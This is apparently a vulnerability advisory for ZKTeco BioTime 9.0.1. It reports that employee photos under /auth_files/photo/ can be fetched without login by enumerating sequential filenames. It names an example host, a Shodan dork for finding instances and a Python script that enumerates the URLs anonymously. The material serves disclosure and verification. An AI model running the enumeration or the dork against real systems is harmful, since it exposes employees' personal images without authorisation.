| Title | ZKteco biotime 9.0.1 Exposure of Access Control List Files to an Unauthorized Control |
|---|
| Description | Vendor: ZKTeco
Product: BioTime (ZKBio Time)
Version: 9.0.1
Description:
Employee photos are served from a predictable URL path without an authentication check. When a site administrator adds a user, or an employee enrolls their picture, the image is stored under /auth_files/photo/ with a short numeric filename. Anyone who can reach the web interface can retrieve every stored photo by enumerating those filenames, bypassing the access controls that protect the rest of the application.
Vulnerability Details:
No password guessing is involved: the filenames are sequential integers, so an attacker only has to walk the number range. The affected URL pattern is:
http://time.xmzkteco.com:8097/auth_files/photo/*
Requesting name.jpg with numbers from 0 to 1000 or more, for example:
http://time.xmzkteco.com:8097/auth_files/photo/109.jpg
returns the photo directly. Iterating the full range retrieves every image stored on the server.
Proof of Concept (PoC):
Using the URL pattern above, an unauthenticated request for each sequential filename returns the corresponding image; no login or session is required.
Dorks:
Shodan query:
http.title:"biotime"
Reported by: CyberSecurity Center - MOI Iraq |
|---|
| Source | https://gist.githubusercontent.com/whiteman007/f7a85252fed91deff6eb3f20596710b0/raw/b7c8a7f53d3316cfd2da1cae9bcf583d923860b7/biotime%25209.0.1 |
|---|
| User | Cybersecurity Center - MOI Iraq (UID 76965) |
|---|
| Submission | 10/31/2024 17:58 |
|---|
| Moderation | 11/09/2024 11:21 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 283662 [ZKTeco ZKBio Time 9.0.1 Image File /auth_files/photo/ direct request] |
|---|
| Points | 20 |
|---|
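The check a practitioner would want before filing or triaging this finding is whether a given instance actually hands /auth_files/photo/<N>.jpg to a client with no session. The script below is an added example written for this page; it is not part of the original submission or of ZKTeco's code. It assumes only what the advisory states (the /auth_files/photo/ path, small integer filenames with a .jpg extension, and a 200 image response to an anonymous request on a vulnerable server). BASE_URL, the User-Agent string and the injectable `fetcher` hook are placeholders chosen for the example; the hook exists so the classification logic can be exercised against constructed responses without a live target.

```python
"""Check whether a BioTime instance serves /auth_files/photo/<N>.jpg without a session.

Added example; not part of the original submission or of ZKTeco's code.
Assumptions (from the advisory): photos sit under /auth_files/photo/, filenames
are small integers ending in .jpg, and a vulnerable server returns them to an
unauthenticated client. BASE_URL is a placeholder, not a real host.
"""
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional
import urllib.error
import urllib.request

PHOTO_PATH = "/auth_files/photo/"
BASE_URL = "http://biotime.example:8097"  # placeholder


@dataclass
class Probe:
    url: str
    status: Optional[int]   # None when the connection itself failed
    content_type: str
    length: int


def candidate_urls(base: str, start: int = 0, end: int = 1000) -> Iterator[str]:
    """Yield the advisory's URL pattern for every integer in [start, end]."""
    base = base.rstrip("/")
    for n in range(start, end + 1):
        yield f"{base}{PHOTO_PATH}{n}.jpg"


def is_exposed_image(status: Optional[int], content_type: str, length: int) -> bool:
    """A 200 carrying an image body means the photo was served with no access check.
    A 3xx (typically a login redirect), 401/403, or an HTML body means some
    control sits in front of the file and the request is not counted as a hit."""
    return status == 200 and content_type.lower().startswith("image/") and length > 0


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a bounce to a login page is the 'protected' signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_opener = urllib.request.build_opener(_NoRedirect)


def fetch(url: str, timeout: float = 5.0) -> Probe:
    """Request one URL with no cookies and report status, content type and body size."""
    req = urllib.request.Request(url, headers={"User-Agent": "photo-exposure-check"})
    try:
        with _opener.open(req, timeout=timeout) as resp:
            body = resp.read()
            return Probe(url, resp.status, resp.headers.get("Content-Type", ""), len(body))
    except urllib.error.HTTPError as err:   # unfollowed 3xx, 401, 403, 404, ...
        return Probe(url, err.code, err.headers.get("Content-Type", ""), 0)
    except urllib.error.URLError:
        return Probe(url, None, "", 0)


def scan(base: str, start: int = 0, end: int = 1000,
         fetcher: Callable[[str], Probe] = fetch) -> List[str]:
    """Return every URL in the range that handed an image to an anonymous client.
    `fetcher` is injectable so the logic can be tested with constructed responses."""
    exposed = []
    for url in candidate_urls(base, start, end):
        p = fetcher(url)
        if is_exposed_image(p.status, p.content_type, p.length):
            exposed.append(url)
    return exposed


if __name__ == "__main__":
    hits = scan(BASE_URL, 0, 50)   # a small sample is enough to confirm exposure
    print(f"{len(hits)} photo(s) retrievable without authentication")
    for h in hits:
        print(h)
```

A handful of 200/image responses from a small range is sufficient evidence; there is no need to pull the whole 0 to 1000 range from a system you do not own. A redirect to the login page or a 401/403 for the same range indicates the instance is not affected or has been patched.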